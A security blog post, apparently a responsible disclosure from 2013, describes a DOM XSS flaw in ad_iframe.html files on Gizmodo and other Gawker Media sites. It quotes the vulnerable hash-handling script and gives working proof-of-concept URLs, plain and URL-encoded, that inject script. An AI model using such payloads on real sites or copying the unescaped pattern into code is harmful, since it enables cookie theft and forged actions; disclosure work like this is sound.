Just cruising along in Gizmodo website I found a problem that caught my attention.
A request to a file called ad_iframe.html on assets directory. Checking the source code of that file I found:
<script>The variable scriptsrc isn't properly escaped from the source location.hash.
var location_parts = window.location.hash.substring(1).split('|');
var rand = location_parts[0];
var scriptsrc = decodeURIComponent(location_parts[1]);
document.write("<scr"+"ipt src='" + scriptsrc + "'></scr"+"ipt>");
</script>
Just giving the expected hashtag and pipe chars, a user could exploit this vulnerability with a DOM XSS to achieve information.
How can this be exploited?
Proof-of-concept on Gizmodo:
http://gizmodo.com/assets/ad_iframe.html#|'></script><script>alert("xss by @dsopas");</script><div x='Proof-of-concept on Gizmodo (encoded):
http://gizmodo.com/assets/ad_iframe.html#|'>%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%20%62%79%20%40%64%73%6F%70%61%73%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%78%3D%27
A malicious user could also:
- access other sites inside another client's private intranet.
- steal another client's cookie(s).
- modify another client's cookie(s).
- steal another client's submitted form data.
- modify another client's submitted form data (before it reaches the server).
- submit a form to your application on the user's behalf which modifies passwords or other application data
This DOM XSS vulnerability was present in many Gawker Media websites:
http://gawker.com/assets/ad_iframe.htmlI want to thank Gawker Media tech team for fixing this issue in less than 24 hours. They really care about security and their users.
http://gizmodo.com/assets/ad_iframe.html
http://lifehacker.com/assets/ad_iframe.html
http://deadspin.com/assets/ad_iframe.html
http://io9.com/assets/ad_iframe.html
http://jalopnik.com/assets/ad_iframe.html
http://jezebel.com/assets/ad_iframe.html
http://kotaku.com/assets/ad_iframe.html
Timeline:
02 Set 2013: Reported to Gawker Media
03 Set 2013: Gawker Media replied that a fix has been deployed
06 Set 2013: Full disclosure
No comments:
Post a Comment